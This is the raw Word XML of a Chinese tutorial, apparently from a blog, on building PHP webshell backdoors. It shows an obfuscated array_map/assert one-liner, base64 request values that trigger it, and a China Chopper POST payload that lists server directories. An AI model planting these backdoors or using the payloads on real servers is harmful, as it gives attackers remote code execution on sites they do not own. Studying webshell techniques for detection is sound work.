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8840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eval函数中参数是字符，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E18E920" w14:textId="77777777" w:rsidR="00E91B46" w:rsidRPr="00E91B46" w:rsidRDefault="00E91B46" w:rsidP="00E91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宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="B294BB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eval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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="B5BD68"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'echo 1;'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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB43D5A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assert函数中参数为表达式 （或者为函数），如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A27F89" w14:textId="77777777" w:rsidR="00E91B46" w:rsidRPr="00E91B46" w:rsidRDefault="00E91B46" w:rsidP="00E91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宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="E6DB74"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>assert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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="E6DB74"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>phpinfo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())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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A037C72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assert(eval('echo 1;'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C9D471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直接传递普通代码是无法执行的，如：assert('echo 1;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E7C146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下面这个代码执行不了:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEE8C8B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@array_map("eval",array('phpinfo();'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692A2D6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肯定会错：  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Warning</w:t>
      </w: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: array_map() expects parameter 1 to be a valid callback, function 'eval' not found or invalid function name，提示array_map第一个参数需要是回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227DCCC7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所以这个后门：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25AA63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@array_map(assert,(array)base64_decode($_REQUEST['xx']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306655D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array_map第二个参数需要再镶嵌一个assert，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B92FA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xx=YXNzZXJ0KCRfUkVRVUVTVFsnYWEnXSk=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F253C4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base64_decode($_REQUEST['xx'])   得到：  assert($_REQUEST['aa'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8462F6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其中aa为菜刀中post的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D572A0" w14:textId="77777777" w:rsidR="00E91B46" w:rsidRPr="00E91B46" w:rsidRDefault="00E91B46" w:rsidP="00E91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宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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 xml:space="preserve"> aa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=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>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="B294BB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eval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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="E6DB74"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>base64_decode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($_POST[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>z0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]));&amp;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>z0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=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>QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="C5C8C6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="Consolas"/>
          <w:color w:val="DE935F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w: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 xml:space="preserve">BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B3652" w14:textId="6DA97C62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  <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E91B46"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  <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdn.net/20170301221005659?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvd2hhdGRheQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E91B46"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  <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14138D04" wp14:editId="200EAA57">
            <wp:extent cx="5486400" cy="2440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46">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FCB99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这样，会构造出：assert(eval('执行代码'))，这个为array_map的第二个参数，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB25DF5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最终将数组中第二个参数回调到第一个数组，执行时代码为：assert(assert(eval('执行代码')) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECB74BD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另一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A76DE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lastRenderedPageBreak/>
        <w:t>$a=(array)base64_decode($_POST['a']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BECE08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array_map(assert,$a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2E945" w14:textId="77777777" w:rsidR="00E91B46" w:rsidRPr="00E91B46" w:rsidRDefault="00E91B46" w:rsidP="00E91B46">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/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</w:pPr>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这时候需要构造post参数为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB9FD0" w14:textId="77777777" w:rsidR="00E91B46" w:rsidRPr="00E91B46" w:rsidRDefault="00E91B46" w:rsidP="00E91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Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C5C8C6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1D1F21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>YT1ldmFsKCdlY2hvIDE7Jyk=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E9454" w14:textId="77777777" w:rsidR="00E91B46" w:rsidRPr="00E91B46" w:rsidRDefault="00E91B46" w:rsidP="00E91B46">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91B46">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（eval('echo 1;')）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7DEB5F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altName w:val="Source Code Pro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E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77427"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{C1CBE27E-C290-D84D-9283-1FBBF79B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1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91B46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E91B4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91B46"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E91B46"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E91B46"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00E91B46"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E91B46"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E91B4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李 由</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-14T12:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-15T03:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>